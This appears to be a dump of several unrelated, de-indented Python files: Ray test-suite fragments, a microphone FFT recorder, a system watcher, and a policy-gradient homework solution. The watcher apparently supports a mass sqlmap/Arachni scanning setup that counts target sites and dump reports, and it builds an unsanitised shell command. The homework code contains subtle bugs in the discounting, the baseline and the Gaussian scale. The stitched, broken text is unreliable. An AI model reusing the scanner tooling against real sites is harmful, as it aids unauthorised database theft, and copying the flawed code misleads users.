# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
with pytest.raises(Exception):
ray.global_state.log_files()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "runtest.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "runtest"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_log_file_api(shutdown_only):
ray.init(num_cpus=1, redirect_worker_output=True)
message = "unique message"
@ray.remote
def f():
logger.info(message)
# The call to sys.stdout.flush() seems to be necessary when using
# the system Python 2.7 on Ubuntu.
sys.stdout.flush()
ray.get(f.remote())
# Make sure that the message appears in the log files.
start_time = time.time()
found_message = False
while time.time() - start_time < 10:
log_files = ray.global_state.log_files()
for ip, innerdict in log_files.items():
for filename, contents in innerdict.items():
contents_str = "".join(contents)
if message in contents_str:
found_message = True
if found_message:
break
time.sleep(0.1)
assert found_message is True
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(redirect_worker_output=True, num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(driver_id=dummy_driver_id)
@ray.remote
def f():
return ray.worker.global_worker.task_driver_id.binary()
assert_equal(dummy_driver_id.binary(), ray.worker.global_worker.worker_id)
task_driver_id = ray.get(f.remote())
assert_equal(dummy_driver_id.binary(), task_driver_id)
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle() == "ray_worker:runtest.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
# Clean up
shutil.rmtree(tempdir)
|
SWHear.py
|
"""
this is a stripped down version of the SWHear class.
It's designed to hold only a single audio sample in memory.
check my githib for a more complete version:
http://github.com/swharden
"""
import pyaudio
import time
import numpy as np
import threading
def getFFT(data, cps):
"""Given some data and cycles per second, returns FFTfreq and FFT"""
data = data * np.hamming(len(data))
fft = np.abs(np.fft.fft(data))
# fft=10*np.log10(fft)
freq = np.fft.fftfreq(len(fft), cps)
return freq, fft
class SWHear():
"""
The SWHear class is provides access to continuously recorded
(and mathematically processed) microphone data.
Arguments:
device - the number of the sound card input to use. Leave blank
to automatically detect one.
rate - sample rate to use. Defaults to something supported.
updatesPerSecond - how fast to record new data. Note that smaller
numbers allow more data to be accessed and therefore high
frequencies to be analyzed if using a FFT later
"""
def __init__(self, device=None, rate=None, updatesPerSecond=10):
self.p = pyaudio.PyAudio()
self.chunk = 4096 # gets replaced automatically
self.updatesPerSecond = updatesPerSecond
self.chunksRead = 0
self.device = device
self.rate = rate
### SYSTEM TESTS
def valid_low_rate(self, device):
"""set the rate to the lowest supported audio rate."""
for testrate in [44100]:
if self.valid_test(device, testrate):
return testrate
print("SOMETHING'S WRONG! I can't figure out how to use DEV", device)
return None
def valid_test(self, device, rate=44100):
"""given a device ID and a rate, return TRUE/False if it's valid."""
try:
self.info = self.p.get_device_info_by_index(device)
if not self.info["maxInputChannels"] > 0:
return False
stream = self.p.open(format=pyaudio.paInt16, channels=1,
input_device_index=device, frames_per_buffer=self.chunk,
rate=int(self.info["defaultSampleRate"]), input=True)
stream.close()
return True
except:
return False
def valid_input_devices(self):
"""
See which devices can be opened for microphone input.
call this when no PyAudio object is loaded.
"""
mics = []
for device in range(self.p.get_device_count()):
if self.valid_test(device):
mics.append(device)
if len(mics) == 0:
print("no microphone devices found!")
else:
print("found %d microphone devices: %s" % (len(mics), mics))
return mics
### SETUP AND SHUTDOWN
def initiate(self):
"""run this after changing settings (like rate) before recording"""
if self.device is None:
self.device = self.valid_input_devices()[0] # pick the first one
if self.rate is None:
self.rate = self.valid_low_rate(self.device)
self.chunk = int(self.rate / self.updatesPerSecond) # hold one tenth of a second in memory
if not self.valid_test(self.device, self.rate):
print("guessing a valid microphone device/rate...")
self.device = self.valid_input_devices()[0] # pick the first one
self.rate = self.valid_low_rate(self.device)
self.datax = np.arange(self.chunk) / float(self.rate)
msg = 'recording from "%s" ' % self.info["name"]
msg += '(device %d) ' % self.device
msg += 'at %d Hz' % self.rate
print(msg)
def close(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording = False # the threads should self-close
while (self.t.isAlive()): # wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
self.p.terminate()
### STREAM HANDLING
def stream_readchunk(self):
"""reads some audio and re-launches itself"""
try:
self.data = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
self.fftx, self.fft = getFFT(self.data, self.rate)
except Exception as E:
print(" -- exception! terminating...")
print(E, "\n" * 5)
self.keepRecording = False
if self.keepRecording:
self.stream_thread_new()
else:
self.stream.close()
self.p.terminate()
print(" -- stream STOPPED")
self.chunksRead += 1
def stream_thread_new(self):
self.t = threading.Thread(target=self.stream_readchunk)
self.t.start()
def stream_start(self):
"""adds data to self.data until termination signal"""
self.initiate()
print(" -- starting stream")
self.keepRecording = True # set this to False later to terminate stream
self.data = None # will fill up with threaded recording data
self.fft = None
self.dataFiltered = None # same
self.stream = self.p.open(format=pyaudio.paInt16, channels=1,
rate=self.rate, input=True, frames_per_buffer=self.chunk)
self.stream_thread_new()
if __name__ == "__main__":
ear = SWHear(updatesPerSecond=10) # optinoally set sample rate here
ear.stream_start() # goes forever
lastRead = ear.chunksRead
while True:
while lastRead == ear.chunksRead:
time.sleep(.01)
print(ear.chunksRead, len(ear.data))
lastRead = ear.chunksRead
print("DONE")
|
system_watcher.py
|
import logger
log = logger.logger_class()
import threading, os, time, subprocess
class system_health_watcher():
# SAVE SETTINGS
def save_sqlmap_settings(self):
try:
log.warning("system_health_watcher|save_sqlmap_settings", "Save sqlmap dump state.")
result = subprocess.Popen(['screen', '-ls'], stdout=subprocess.PIPE)
for processes in result.stdout.readlines():
if "sqlmap" in processes:
sqlmap_dump = processes.split(".")[2] + "." + processes.split(".")[3] + "." + \
processes.split(".")[4].split(" ")[0]
subprocess.call("sed -i.bak '/" + sqlmap_dump + "/d' ./sqlmap_done.txt", shell=True)
except Exception, error_code:
log.warning("system_health_watcher|save_sqlmap_settings", str(error_code))
pass
# CHECK MEMORY USAGE
def check_memory_usage(self):
try:
while True:
try:
tot_m, used_m, free_m = map(int, os.popen('free -t -m').readlines()[-1].split()[1:])
log.info("system_health_watcher|check_memory_usage",
"Total memory: " + str(tot_m) + " | Used memory: "
+ str(used_m) + " | Free memory: " + str(free_m))
if free_m < 200:
log.warning("system_health_watcher|check_memory_usage", "Not enough memory in the system, "
"force reboot.")
self.save_sqlmap_settings()
os.system("reboot -f")
time.sleep(5)
except Exception, error_code:
log.warning("system_health_watcher|check_memory_usage", str(error_code))
pass
except Exception, error_code:
log.warning("system_health_watcher|check_memory_usage", str(error_code))
pass
# UPDATE STATS FILE
def update_stats(self, indb, done):
try:
stats = open("stats.txt", "w+")
stats.write("SITES_IN_DB = " + indb + "\n")
stats.write("SITES_LEFT = " + done + "\n")
stats.write("REPORTS_COUNT = " + str(len(os.listdir("reports"))) + "\n")
stats.write("REPORTS_REQUESTS = " + str(len(os.listdir("reports_requests"))) + "\n")
except Exception, error_code:
log.warning("system_health_watcher|update_stats", str(error_code))
pass
def __init__(self):
try:
log.info("system_health_watcher|__init__", "Started.")
check_memory_usage_thread = threading.Thread(target=self.check_memory_usage)
check_memory_usage_thread.start()
except Exception, error_code:
log.warning("arachni_scanner_class|__init__", str(error_code))
pass
|
train_pg_f18_pt.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import torch.nn as nn
import torch
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
from utils import normalize, init_weights
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
class MLP(nn.Module):
def __init__(self, input_size, output_size, n_layers, hidden_size, is_discrete):
super(MLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.is_discrete = is_discrete
self.logstd = nn.Parameter(torch.randn((self.output_size,)))
self.fc_input = nn.Linear(self.input_size, self.hidden_size)
self.middle_layers = []
for _ in range(n_layers - 1):
self.middle_layers.append(
nn.Linear(self.hidden_size, self.hidden_size))
self.m_layers = nn.ModuleList(self.middle_layers)
self.out_layer = nn.Linear(self.hidden_size, self.output_size)
self.sm = nn.Softmax()
def forward(self, x):
x = nn.functional.tanh(self.fc_input(x))
for layer in self.m_layers:
x = nn.functional.tanh(layer(x))
x = self.out_layer(x)
if self.is_discrete:
x = self.sm(x)
return x
else:
return x, self.logstd
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
# Model def.
self.model = MLP(self.ob_dim, self.ac_dim,
self.n_layers, self.size, self.discrete)
self.model.apply(init_weights)
self.lr = 1e-3
self.beta1 = 0.9
self.beta2 = 0.999
if self.nn_baseline:
self.baseline_model = MLP(
self.ob_dim, 1, self.n_layers, self.size, True)
self.baseline_model.apply(init_weights)
# FIX this
self.base_opt = torch.optim.Adam(self.baseline_model.parameters(
), lr=self.lr, betas=(self.beta1, self.beta2))
self.opt = torch.optim.Adam(self.model.parameters(
), lr=self.lr, betas=(self.beta1, self.beta2))
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = self.model(sy_ob_no)
return sy_logits_na
else:
sy_mean, sy_logstd = self.model(sy_ob_no)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = torch.multinomial(
sy_logits_na, num_samples=1).view(-1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = torch.normal(mean=sy_mean, std=sy_logstd.exp())
sy_sampled_ac = sy_sampled_ac.sum(-1)
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
dist = torch.distributions.categorical.Categorical(
logits=sy_logits_na)
sy_logprob_n = dist.log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
# Reparam
dist = torch.distributions.Normal(loc=sy_mean, scale=sy_logstd)
sy_logprob_n = dist.log_prob(sy_ac_na)
return sy_logprob_n
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode = (len(paths) == 0 and (
itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ob_pt = torch.from_numpy(ob).float()
policy_parameters = self.model(ob_pt)
ac = self.sample_action(policy_parameters)
ac = ac.numpy()
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation": np.array(obs, dtype=np.float32),
"reward": np.array(rewards, dtype=np.float32),
"action": np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Mont e Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
q_n = []
if self.reward_to_go:
ret_tau = 0
for re in re_n:
for i in range(len(re)):
Q_re = 0
for j in range(i, len(re)):
discount = self.gamma ** j
ret_tau = discount * re[j]
Q_re += ret_tau
q_n.append(Q_re)
else:
ret_tau = 0
for re in re_n:
Q_re = 0
for i in range(len(re)):
discount = self.gamma ** i
ret_tau = discount * re[i]
Q_re += ret_tau
q_n.extend([Q_re] * len(re))
return np.asarray(q_n)
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
ob_no_pt = torch.from_numpy(ob_no).type(torch.FloatTensor)
b_n = self.baseline_model(ob_no_pt)
b_n.detach.numpy()
b_n = normalize(b_n, mu=np.mean(q_n), std=np.std(q_n))
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = normalize(adv_n)
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
# 1) numpy -> tensor
# 2) obs to model, get policy parameters
# a model.forward, sample actions, get logprobs
# 3) get the loss, logprobs * advantages
# 4) zero_grad, loss.back(), opt.step
ob_no_pt = torch.from_numpy(ob_no).type(torch.FloatTensor)
ac_na_pt = torch.from_numpy(ac_na).type(torch.FloatTensor)
q_n_pt = torch.from_numpy(q_n).type(torch.FloatTensor)
adv_n_pt = torch.from_numpy(adv_n).type(torch.FloatTensor)
# # Policy forward
policy_parameters = self.policy_forward_pass(ob_no_pt)
# Get the log prob
log_prob = self.get_log_prob(policy_parameters, ac_na_pt)
model_loss = - (log_prob * adv_n_pt).mean()
self.opt.zero_grad()
model_loss.backward()
self.opt.step()
#====================================================================================#
# ----------PROBLEM 6----------
# TODO
#
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# predicts the q
# 1) cast
# 2) model forward,
# 3) loss.mse
# 4) blabla
# YOUR_CODE_HERE
q_n_baseline_output = self.baseline_model(ob_no_pt).view(-1)
q_n_pt_normalized = (q_n_pt - q_n_pt.mean()) / (q_n_pt.std() + 1e-7)
loss_fn = torch.nn.MSELoss()
self.baseline_loss = loss_fn(q_n_baseline_output, q_n_pt_normalized)
self.base_opt.zero_grad()
self.baseline_loss.backward()
self.base_opt.step()
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args,
sample_trajectory_args, estimate_return_args)
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************" % itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
# PT loss.backward here
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
